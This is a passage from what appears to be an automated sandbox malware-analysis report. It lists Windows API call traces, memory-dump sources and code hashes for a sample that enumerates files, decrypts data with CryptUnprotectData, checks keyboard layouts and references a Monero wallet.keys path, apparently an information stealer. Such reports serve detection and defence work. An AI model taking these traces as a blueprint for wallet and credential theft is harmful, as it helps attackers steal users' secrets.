                                    • Part of subcall function 0054A920: lstrcpy.KERNEL32(00000000,?), ref: 0054A972
                                    • Part of subcall function 0054A920: lstrcat.KERNEL32(00000000), ref: 0054A982
                                    • Part of subcall function 0054A9B0: lstrlen.KERNEL32(?,011F8F68,?,\Monero\wallet.keys,00550E17), ref: 0054A9C5
                                    • Part of subcall function 0054A9B0: lstrcpy.KERNEL32(00000000), ref: 0054AA04
                                    • Part of subcall function 0054A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0054AA12
                                    • Part of subcall function 0054A8A0: lstrcpy.KERNEL32(?,00550E17), ref: 0054A905
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                   • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                  • String ID: \*.*
                                  • API String ID: 1415058207-1173974218
                                  • Opcode ID: 6797edfa35808feed284fd4f6ee82f5f3d2931fae6515199029dfdc3029b67b4
                                  • Instruction ID: 2508fc5b207e5725b4d825ed5f67d7cbe5c2d58889ecf03e6da21a89a5196c7a
                                  • Opcode Fuzzy Hash: 6797edfa35808feed284fd4f6ee82f5f3d2931fae6515199029dfdc3029b67b4
                                  • Instruction Fuzzy Hash: 3D125671950119ABEB59FB60CC9AEED7B38FF94308F404599B50A62091EF306F89CF91
                                  APIs
                                    • Part of subcall function 0054A740: lstrcpy.KERNEL32(00550E17,00000000), ref: 0054A788
                                    • Part of subcall function 0054A9B0: lstrlen.KERNEL32(?,011F8F68,?,\Monero\wallet.keys,00550E17), ref: 0054A9C5
                                    • Part of subcall function 0054A9B0: lstrcpy.KERNEL32(00000000), ref: 0054AA04
                                    • Part of subcall function 0054A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0054AA12
                                    • Part of subcall function 0054A8A0: lstrcpy.KERNEL32(?,00550E17), ref: 0054A905
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00550C2E), ref: 0053DE5E
                                  • StrCmpCA.SHLWAPI(?,005514C8), ref: 0053DEAE
                                  • StrCmpCA.SHLWAPI(?,005514CC), ref: 0053DEC4
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0053E3E0
                                  • FindClose.KERNEL32(000000FF), ref: 0053E3F2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                   • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                  • String ID: \*.*
                                  • API String ID: 2325840235-1173974218
                                  • Opcode ID: b85d14cc6a5e55a503b328ba957c888dd1d23a55bc8fa4fa19e1b5d823258ae4
                                  • Instruction ID: 5c2580fdbf5811fd7513ac5b619144c5d2ba3cdda741fb3d30f05cf5c16a035b
                                  • Opcode Fuzzy Hash: b85d14cc6a5e55a503b328ba957c888dd1d23a55bc8fa4fa19e1b5d823258ae4
                                  • Instruction Fuzzy Hash: 9AF1F6718541199AEB55FB60DC9AEEE7B38FF94308F4041D9B40A62091EF306F89CF56
                                  APIs
                                    • Part of subcall function 0054A740: lstrcpy.KERNEL32(00550E17,00000000), ref: 0054A788
                                    • Part of subcall function 0054A920: lstrcpy.KERNEL32(00000000,?), ref: 0054A972
                                    • Part of subcall function 0054A920: lstrcat.KERNEL32(00000000), ref: 0054A982
                                    • Part of subcall function 0054A9B0: lstrlen.KERNEL32(?,011F8F68,?,\Monero\wallet.keys,00550E17), ref: 0054A9C5
                                    • Part of subcall function 0054A9B0: lstrcpy.KERNEL32(00000000), ref: 0054AA04
                                    • Part of subcall function 0054A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0054AA12
                                    • Part of subcall function 0054A8A0: lstrcpy.KERNEL32(?,00550E17), ref: 0054A905
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,005514B0,00550C2A), ref: 0053DAEB
                                  • StrCmpCA.SHLWAPI(?,005514B4), ref: 0053DB33
                                  • StrCmpCA.SHLWAPI(?,005514B8), ref: 0053DB49
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0053DDCC
                                  • FindClose.KERNEL32(000000FF), ref: 0053DDDE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                   • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                  • String ID:
                                  • API String ID: 3334442632-0
                                  • Opcode ID: 6c167dd941c7f4d4c3ab082e8ca10173487b41a1b19b964fef79491e444bf73d
                                  • Instruction ID: e17f47a284b3d9e08a64b42a8535dd40e2c958a69501bc581c06fa34e3b766fb
                                  • Opcode Fuzzy Hash: 6c167dd941c7f4d4c3ab082e8ca10173487b41a1b19b964fef79491e444bf73d
                                  • Instruction Fuzzy Hash: 3B915572900105ABDB14FB70EC5ADED7B7DFBC4344F408558F80A96185EE34AB59CBA2
                                  APIs
                                    • Part of subcall function 0054A740: lstrcpy.KERNEL32(00550E17,00000000), ref: 0054A788
                                  • GetKeyboardLayoutList.USER32(00000000,00000000,005505AF), ref: 00547BE1
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 00547BF9
                                  • GetKeyboardLayoutList.USER32(?,00000000), ref: 00547C0D
                                  • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00547C62
                                  • LocalFree.KERNEL32(00000000), ref: 00547D22
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                   • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                  • String ID: /
                                  • API String ID: 3090951853-4001269591
                                  • Opcode ID: 21628a9c054891eaa4fdeaf333ae9b8808bca7280087f48f0143b5f02bdc42f6
                                  • Instruction ID: 83d8b39fe353288c375fa64f5cac890900c334f9e3780b2d606602f8cc94c8a2
                                  • Opcode Fuzzy Hash: 21628a9c054891eaa4fdeaf333ae9b8808bca7280087f48f0143b5f02bdc42f6
                                  • Instruction Fuzzy Hash: AE414C7194021DABDB64DB94DC9DBEEBB74FF88708F204199E50962181DB342F85CFA1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                   • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: !%{$6qvA$]{S$o5_$qmg7$*Q$Iy<
                                  • API String ID: 0-2781839334
                                  • Opcode ID: 66a7fe63f2c199d89f150b1c92da9130be9dd442676108ba3907cba196c2fa8c
                                  • Instruction ID: f5001895ac31e6b728f0f631c815b32732d9a52348a05fd5735c74ec8a47566f
                                  • Opcode Fuzzy Hash: 66a7fe63f2c199d89f150b1c92da9130be9dd442676108ba3907cba196c2fa8c
                                  • Instruction Fuzzy Hash: 73B206F3A082149FE304AE2DDC8567AB7E9EFD4720F1A893DEAC4C3744E67558018697
                                  APIs
                                    • Part of subcall function 0054A740: lstrcpy.KERNEL32(00550E17,00000000), ref: 0054A788
                                    • Part of subcall function 0054A920: lstrcpy.KERNEL32(00000000,?), ref: 0054A972
                                    • Part of subcall function 0054A920: lstrcat.KERNEL32(00000000), ref: 0054A982
                                    • Part of subcall function 0054A9B0: lstrlen.KERNEL32(?,011F8F68,?,\Monero\wallet.keys,00550E17), ref: 0054A9C5
                                    • Part of subcall function 0054A9B0: lstrcpy.KERNEL32(00000000), ref: 0054AA04
                                    • Part of subcall function 0054A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0054AA12
                                    • Part of subcall function 0054A8A0: lstrcpy.KERNEL32(?,00550E17), ref: 0054A905
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00550D73), ref: 0053E4A2
                                  • StrCmpCA.SHLWAPI(?,005514F8), ref: 0053E4F2
                                  • StrCmpCA.SHLWAPI(?,005514FC), ref: 0053E508
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0053EBDF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                   • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                  • String ID: \*.*
                                  • API String ID: 433455689-1173974218
                                  • Opcode ID: 68520116eb90b851c4a389733cf8ee2efaffafdd158d0f1e516e3855914c4a2f
                                  • Instruction ID: 0307dbdbc89cbea12661d1143f3e647a4477769d73851d76bb1e5fe43653b9be
                                  • Opcode Fuzzy Hash: 68520116eb90b851c4a389733cf8ee2efaffafdd158d0f1e516e3855914c4a2f
                                  • Instruction Fuzzy Hash: BC126332940119AAEB54FB70DC9AEED7B78BFD4308F404599B50A92091EF306F49CF92
                                  APIs
                                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NS,00000000,00000000), ref: 00539AEF
                                  • LocalAlloc.KERNEL32(00000040,?,?,?,00534EEE,00000000,?), ref: 00539B01
                                  • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,NS,00000000,00000000), ref: 00539B2A
                                  • LocalFree.KERNEL32(?,?,?,?,00534EEE,00000000,?), ref: 00539B3F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                   • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: BinaryCryptLocalString$AllocFree
                                  • String ID: NS
                                  • API String ID: 4291131564-2024404569
                                  • Opcode ID: e76d99e3d4b85cc031746bfd835286f78bfd77a6744634bf6eb6aefb1e806ea0
                                  • Instruction ID: b74ce7096bbc879bf6aa34d65b83d749ee62b8864e493ff1dea902243f8b4ef0
                                  • Opcode Fuzzy Hash: e76d99e3d4b85cc031746bfd835286f78bfd77a6744634bf6eb6aefb1e806ea0
                                  • Instruction Fuzzy Hash: 1411A4B4640208FFEB10CF64DC95FAAB7B5FB89700F208058F9199B390C7B5A951CB55
                                  APIs
                                  • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0053C871
                                  • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0053C87C
                                  • lstrcat.KERNEL32(?,00550B46), ref: 0053C943
                                  • lstrcat.KERNEL32(?,00550B47), ref: 0053C957
                                  • lstrcat.KERNEL32(?,00550B4E), ref: 0053C978
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                   • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$BinaryCryptStringlstrlen
                                  • String ID:
                                  • API String ID: 189259977-0
                                  • Opcode ID: 973c6d032cf866f50e380f20d106d2f93830fb9a3a949365971ee05b2c76647b
                                  • Instruction ID: 3393c03dfa6b0f61247babdd7c5cb45edfb3f64a5979e353a7ccda707da2b7e6
                                  • Opcode Fuzzy Hash: 973c6d032cf866f50e380f20d106d2f93830fb9a3a949365971ee05b2c76647b
                                  • Instruction Fuzzy Hash: 2E41847590421AEFDB10DF90DD89BFEBBB8BB84744F1045A8E509A6280D7745A84CF92
                                  APIs
                                  • GetSystemTime.KERNEL32(?), ref: 0054696C
                                  • sscanf.NTDLL ref: 00546999
                                  • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 005469B2
                                  • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 005469C0
                                  • ExitProcess.KERNEL32 ref: 005469DA
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                   • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Time$System$File$ExitProcesssscanf
                                  • String ID:
                                  • API String ID: 2533653975-0
                                  • Opcode ID: cf5fc111f33f75bfefe8ec19b003792e7959d5b032232d7c1c6749e5239d13b9
                                  • Instruction ID: d9aac39075e1b63104bf86f8f5c2b34c06bfd80a01912d84288082a490804d66
                                  • Opcode Fuzzy Hash: cf5fc111f33f75bfefe8ec19b003792e7959d5b032232d7c1c6749e5239d13b9
                                  • Instruction Fuzzy Hash: 2B210175D04209ABDF04EFE4D945AEEB7B5FF88304F04852EE40AE3250EB345605CB6A
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0053724D
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00537254
                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00537281
                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 005372A4
                                  • LocalFree.KERNEL32(?), ref: 005372AE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                   • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733402536.0000000000612000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733402536.000000000077A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733640578.000000000078E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733640578.0000000000914000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733640578.00000000009EB000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733640578.0000000000A0E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733640578.0000000000A17000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733640578.0000000000A25000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1739892696.0000000000A26000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1740743869.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1740779511.0000000000BBB000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_530000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                  • String ID:
                                  • API String ID: 2609814428-0
                                  • Opcode ID: 02e0dc0f72eb6c958817c7a8ce8a247a54c0f9f3a5a9cdfb827f0ff6b866dd4e
                                  • Instruction ID: dc99562f6df7f6124d1bdb087cbf0941ea153452e07a07b0d83d34aee03a7385
                                  • Opcode Fuzzy Hash: 02e0dc0f72eb6c958817c7a8ce8a247a54c0f9f3a5a9cdfb827f0ff6b866dd4e
                                  • Instruction Fuzzy Hash: 0D0100B5A40208BBEB14DBD4CD46F9E77B8BB44701F108555FB09AA2C0D674AA408B6A
                                  APIs
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0054961E
                                  • Process32First.KERNEL32(00550ACA,00000128), ref: 00549632
                                  • Process32Next.KERNEL32(00550ACA,00000128), ref: 00549647
                                  • StrCmpCA.SHLWAPI(?,00000000), ref: 0054965C
                                  • CloseHandle.KERNEL32(00550ACA), ref: 0054967A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1733402536.0000000000531000.00000040.00000001.01000000.00000003.sdmp, Offset: 00530000, based on PE: true
                                   • Associated: 00000000.00000002.1733363705.0000000000530000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733402536.00000000005E1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1733402536.00000000005ED000.00000040.00000001.01000000.00000003.sdmp
